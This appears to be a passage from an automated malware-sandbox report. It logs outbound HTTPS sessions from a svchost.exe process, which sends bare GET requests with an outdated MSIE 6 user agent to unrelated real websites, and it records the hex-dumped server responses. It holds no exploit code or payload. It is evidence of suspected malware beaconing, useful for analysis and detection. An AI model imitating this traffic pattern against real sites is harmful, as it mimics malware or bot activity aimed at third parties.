                                                                                                                                                                              2023-09-15 05:28:20 UTC7122INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              4192.168.2.350211185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC2OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:27:23 UTC53INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:23 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:27:23 UTC53INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              5192.168.2.350245172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC52OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: orlyhotel.com
                                                                                                                                                                              2023-09-15 05:27:24 UTC56INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:24 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                              Expires: Fri, 15 Sep 2023 05:14:21 GMT
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              Last-Modified: Fri, 15 Sep 2023 05:14:21 GMT
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Vary: Accept-Language
                                                                                                                                                                              Set-Cookie: django_language=en; expires=Sat, 14-Sep-2024 05:14:21 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zp75wrkNCzG5BJpOgO4PgmMvNcjP7w3b92cTZ4NK5XFe%2By6fHtqJoPh3Qge3wH27Y6OXuo60%2FELLLgEsUXDUzqZYrSvUlz8FyyDExMb4DtKIzjWNC8%2FJ69EvO2bK%2FvXQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e75d71db442b3-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              2023-09-15 05:27:24 UTC57INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                              Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                              2023-09-15 05:27:24 UTC57INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              6192.168.2.350247172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC54OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.clinicasanluis.com.co
                                                                                                                                                                              2023-09-15 05:27:25 UTC65INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              x-powered-by: PHP/8.1.22
                                                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                              set-cookie: XSRF-TOKEN=eyJpdiI6IlpMdWh4dFJud3JSTWxuc3o3Nzk0L0E9PSIsInZhbHVlIjoiYXo3amVJcXhKZkRIMmc0WVVMWktpdnBnWTU2Qk5mTnpJT1VSSTAvckRLbGNLdG5VUHIvSXVtTDlmOTlpT0FNN1FqMnBCZW1Ma1BpUEd0N01qeStML1VmWEVKT1hNU3RORGxyMVZ3VVR4T3hMVUNKeFVreGVONGUraHV1MFBWL3MiLCJtYWMiOiIzNjc0MWQxNTFlZDJjMWNkZDMwMWZmNGJhNDVhMzI0MzEwY2UwMWUzNTczNDIxMzQzNzg4YzA2NzBlZTQ4YTY0IiwidGFnIjoiIn0%3D; expires=Fri, 15-Sep-2023 07:27:24 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                              set-cookie: clinicasanluis_session=eyJpdiI6IkZOZVJvR1p0YUxrOHZQeld2cWhKeEE9PSIsInZhbHVlIjoiVXI5TCt1NlhiVHRPejZsQjhQc0w2T0tlbG9zaEFCQ0toMlBQbUJtZkhEWktPbzFzajlhNHl2cWRxazF0VTdJQ2pMeENKVTR3ZEhxcm9iTFVXRHQ4bjJxdFI1Q3JOSkwrVU9kTklxcjhGRmpZRGhDOTRqaXJPemk0STNBQmJ4NkQiLCJtYWMiOiIzYjAzNWNmZTBiYWJmMWI3ZTBiMmVmMWRlYjQ4OTRlMWZlZTRiNzE4ZDMxYWJiZmI1OWMxYjkxMzRlM2ViYzA0IiwidGFnIjoiIn0%3D; expires=Fri, 15-Sep-2023 07:27:24 GMT; Max-Age=7200; path=/; httponly; secure
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              2023-09-15 05:27:25 UTC66INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 46 42 58 6a 25 32 42 6e 53 6f 71 74 45 69 64 69 73 31 64 35 75 63 6e 79 30 39 43 71 30 46 75 31 43 4b 64 57 25 32 46 74 25 32 42 63 62 48 75 75 75 50 77 73 44 25 32 42 53 55 6b 70 6e 43 7a 30 45 72 6f 36 34 50 6b 63 6f 4b 44 46 37 33 66 58 46 45 4b 79 32 76 63 32 6e 76 72 78 75 53 4f 74 36 65 39 64 52 51 4b 66 31 5a 43 63 59 42 25 32 46 6f 50 50 77 62 75 69 6f 50 4d 69 6b 73 58 72 43 32 77 46 77 6d 61 61 36 25 32 42 51 58 74 48 58 25 32 42 64 47 46 53 77 42 31 6e 58 4d 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c
                                                                                                                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FBXj%2BnSoqtEidis1d5ucny09Cq0Fu1CKdW%2Ft%2BcbHuuuPwsD%2BSUkpnCz0Ero64PkcoKDF73fXFEKy2vc2nvrxuSOt6e9dRQKf1ZCcYB%2FoPPwbuioPMiksXrC2wFwmaa6%2BQXtHX%2BdGFSwB1nXM"}],"group":"cf-nel
                                                                                                                                                                              2023-09-15 05:27:25 UTC67INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 53 69 74 65 20 54 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 31 53 35 53 4d 45 44 48 33 4b 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61
                                                                                                                                                                              Data Ascii: 7ff9<!doctype html><html lang="es"><head> ... Global Site Tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-1S5SMEDH3K"></script> <script> window.dataLayer = window.dataLa
                                                                                                                                                                              2023-09-15 05:27:25 UTC68INData Raw: 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 73 65 6f 2f 73 65 6f 2d 6d 65 74 61 64 61 74 61 2d 73 69 74 65 2d 36 34 39 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c c3 ad 6e 69 63 61 20 53 61 6e 20 4c 75 c3 ad 73 20 70 61 72 61 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 65 73 65 72 76 61 6d 6f 73 20 6c 61 20 76 69 64 61 20 64 65 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 20 61 20 74 72 61 76 c3 a9
                                                                                                                                                                              Data Ascii: content="https://www.clinicasanluis.com.co/images/seo/seo-metadata-site-649.jpg"><meta property="og:title" content="Clnica San Lus para la mujer y el nio"><meta property="og:description" content="Preservamos la vida de la mujer y el nio a trav
                                                                                                                                                                              2023-09-15 05:27:25 UTC70INData Raw: 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 3b 39 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 0a 20 20 20 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e
                                                                                                                                                                              Data Ascii: ?family=Open+Sans:wght@400;600;700&family=Rubik:wght@400;500;600;700&display=swap"></noscript><link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&display=swap" onload="this.onload=null;this.
                                                                                                                                                                              2023-09-15 05:27:25 UTC71INData Raw: 20 50 6f 70 75 70 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 21 2d 2d 20 49 63 6f 6e 73 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                              Data Ascii: Popup CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/css/magnific-popup.min.css">... Icons CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/fonts/font-awesome/css/all.min.css"><link rel="styl
                                                                                                                                                                              2023-09-15 05:27:25 UTC72INData Raw: 79 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 73 6c 69 63 6b 2d 63 61 72 6f 75 73 65 6c 2f 31 2e 38 2e 31 2f 73 6c 69 63 6b 2d 74 68 65 6d 65 2e 63 73 73 22 0a 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 36 6c 4c 55 64 65 51 35 75 68 65 4d 46 62 57 6d 33 43 50 32 37 31 6c 31 34 52 73 58 31 78 74 78 2b 4a 35 78 32 79 65 49 44 6b 6b 69 42 70 65 56 54 4e 68 54 71 69 6a 4d 45 37 47
                                                                                                                                                                              Data Ascii: y="no-referrer" onload="this.onload=null;this.rel='stylesheet'" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick-theme.css" integrity="sha512-6lLUdeQ5uheMFbWm3CP271l14RsX1xtx+J5x2yeIDkkiBpeVTNhTqijME7G
                                                                                                                                                                              2023-09-15 05:27:25 UTC74INData Raw: 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72 6f 6e 74 65 6e 64 2f 72 65 76 6f 6c 75 74 69 6f 6e 2f 63 73 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 45 56 4f 4c 55 54 49 4f 4e 20 53 4c 49 44 45 52 20 43 55 53 54 4f 4d 20 43 53 53 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72
                                                                                                                                                                              Data Ascii: css" href="https://www.clinicasanluis.com.co/themes/damosfrontend/revolution/css/navigation.css" /> </noscript> ... REVOLUTION SLIDER CUSTOM CSS --> <link rel="stylesheet" type="text/css" href="https://www.clinicasanluis.com.co/themes/damosfr
                                                                                                                                                                              2023-09-15 05:27:25 UTC75INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                                                                                                                              Data Ascii: <i class="fab fa-instagram"></i> </a> </li> </ul> </div> </div> <div c
                                                                                                                                                                              2023-09-15 05:27:25 UTC76INData Raw: 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 62 6f 74 74 6f 6d 2d 68 65 61 64 65 72 20 70 71 2d 68 61 73 2d 73 74 69 63 6b 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 63 75 73 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32
                                                                                                                                                                              Data Ascii: /ul> </div> </div> </div> </div> </div> <div class="pq-bottom-header pq-has-sticky"> <div class="container-custom"> <div class="row"> <div class="col-lg-12
                                                                                                                                                                              2023-09-15 05:27:25 UTC78INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 6d 69 73 69 6f 6e 2d 79 2d 76 69 73 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4d 69 73 69 c3 b3 6e 20 79 20 56 69 73 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="nosotros/mision-y-vision" target="_self">Misin y Visin</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC79INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 73 69 73 74 65 6d 61 2d 64 65 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 74 65 72 6e 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 69 73 74 65 6d 61 20 64 65 20 63 6f 6e 74 72 6f 6c 20 69 6e 74 65 72 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="nosotros/sistema-de-control-interno" target="_self">Sistema de control interno</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC80INData Raw: 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 50 65 64 69 c3 a1 74 72 69 63 61 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: enu-item-has-children"> <a tabindex=0> Peditricas</a> <i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub-menu">
                                                                                                                                                                              2023-09-15 05:27:25 UTC82INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 67 61 73 74 72 6f 65 6e 74 65 72 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 61 73 74 72 6f 65 6e 74 65 72 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="menu-item "><a href="especialidades/pediatricas/gastroenterologia" target="_self">Gastroenterologa</a></li>
